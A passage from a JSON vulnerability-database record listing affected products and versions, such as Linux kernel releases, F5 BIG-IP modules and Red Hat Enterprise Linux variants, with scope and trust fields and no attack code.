        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "sd-wan orchestrator by velocloud",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.7"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "openshift online",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "0"
      },
      {
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.2"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.3"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "siem enterprise security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "hypervisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.0"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "pulse console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "7.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "linux esm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "big-ip afm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "sd-wan orchestrator by velocloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip pem hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.6"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "big-ip ltm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip gtm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip afm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "skyline collector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.5"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "hybrid cloud extension",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.6"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "big-ip afm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "element software management node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.2"
      },
      {
        "model": "vrealize log insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "big-ip apm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "openstack platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.7"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "secure pulse secure vadc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pulse",
        "version": "0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "big-ip dns hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.7"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "element software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "18.04"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "enterprise linux for x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7."
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.0.1"
      },
      {
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.6"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.6"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "big-ip aam build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip analytics hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "codeready linux builder for arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "648"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "data loss prevention monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "-11.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.82"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.7"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "sd-wan gateway by velocloud",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "vcenter server appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "big-ip pem hf3",
        "scope": "eq",
        "trust": 0.3,
